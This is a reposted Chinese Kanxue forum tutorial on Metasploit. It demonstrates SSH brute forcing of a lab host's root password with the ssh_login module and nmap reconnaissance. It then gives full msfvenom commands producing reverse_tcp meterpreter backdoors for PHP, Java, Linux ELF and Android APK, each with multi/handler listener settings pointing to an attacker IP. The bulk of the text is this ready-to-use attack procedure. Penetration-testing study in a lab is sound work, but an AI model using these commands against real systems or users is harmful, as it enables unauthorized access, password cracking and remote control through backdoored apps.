1. 威客安全首页
  2. 安全资讯

Metasploit后门以及跨平台后门生成

Metasploit后门以及跨平台后门生成
本文为看雪论坛优秀文章
看雪论坛作者ID:Lǎn māo


目录
一、Metasploit对目标主机SSH爆破
          爆破过程
二、PHP后门生成
三、JAVA后门生成
四、LINUX后门生成
五、Android后门生成
☛参考文档



一、Metasploit对目标主机SSH爆破




实验原理:靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务。

>>>>

爆破过程


1. 验证局域网内部存活主机:nmap -sP 192.168.73.0/24;得到靶机IP。
 
Metasploit后门以及跨平台后门生成

2. 扫描靶机的操作系统nmap -O 192.168.73.128;得到靶机的操作系统及版本号。
 
Metasploit后门以及跨平台后门生成

3. 扫描靶机的端口开放及应用程序的版本号:nmap -sV -Pn 192.168.73.128;发现22端口开放,其应用程序为ssh。
 
Metasploit后门以及跨平台后门生成

4. 打开Metasploit工具,利用msf ssh_login模块暴力破解靶机ssh密码:use auxiliary/scanner/ssh/ssh_login;进入模块show options配置。

Metasploit后门以及跨平台后门生成
 
5.建立用户名字典及密码字典(为了减少爆破时间,用户名及密码设置特定的几个即可)。

Metasploit后门以及跨平台后门生成

将user.txt和pass.txt文件放到kali linux指定目录下。

6. 准备进行ssh爆破:设置用户名字典和密码字典的路径;设置靶机的IP地址;设置线程为50;开始执行。

Metasploit后门以及跨平台后门生成

exploit之后,没有显示;将VERBOSE设置为true即可。

7. 等待ssh爆破执行完毕。

Metasploit后门以及跨平台后门生成

8. 开始链接:

Metasploit后门以及跨平台后门生成



二、PHP后门生成



1. 示例指令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php

LHOST:攻击者IP

PHP后门代码:

Metasploit后门以及跨平台后门生成

2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听

Metasploit后门以及跨平台后门生成

php后门使用:

Metasploit后门以及跨平台后门生成



三、JAVA后门生成



1. 示例指令:

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar

Metasploit后门以及跨平台后门生成
 
2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听

Metasploit后门以及跨平台后门生成

java后门使用


Metasploit后门以及跨平台后门生成



四、LINUX后门生成



1. 示例指令:


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell
 
Metasploit后门以及跨平台后门生成

2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听

Metasploit后门以及跨平台后门生成

linux后门使用


Metasploit后门以及跨平台后门生成



五、Android后门生成



1. 示例指令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=5555 R > /root/Linux/backdoor.apk

Metasploit后门以及跨平台后门生成
 
2. 配置Metasploit,exploit监听:

search exploit/hanler // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler // 使用模块
show options // 配置
set LHOST 192.168.73.131
set LPORT 5555
set payload android/meterpreter/reverse_tcp // 设置测试的载荷
exploit // 监听

Metasploit后门以及跨平台后门生成

☛参考文档
https://blog.csdn.net/Tahir_111/article/details/82389570
https://bbs.ichunqiu.com/thread-20137-1-1.html
Metasploit后门渗透Linux系统以及跨平台后门生成.md



Metasploit后门以及跨平台后门生成
– End –




Metasploit后门以及跨平台后门生成



看雪ID:Lǎn māo

https://bbs.pediy.com/user-828426.htm 


*本文由看雪论坛  Lǎn māo  原创,转载请注明来自看雪社区







推荐文章++++

Metasploit后门以及跨平台后门生成

AFL afl_fuzz.c 详细分析

小白的CVE-2010-0249——极光行动漏洞分析

一款二代壳的脱壳成长之路

手动打造应用层钩子扫描

跨平台模拟执行 – AndroidNativeEmu实用手册 







进阶安全圈,不得不读的一本书Metasploit后门以及跨平台后门生成







Metasploit后门以及跨平台后门生成




Metasploit后门以及跨平台后门生成
“阅读原文”一起来充电吧!

原文始发于微信公众号(看雪学院):Metasploit后门以及跨平台后门生成

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论

联系我们

4006-119-120

在线咨询:点击这里给我发消息

邮件:public@jinlongsec.com

工作时间:周一至周五,9:30-18:30,节假日休息

X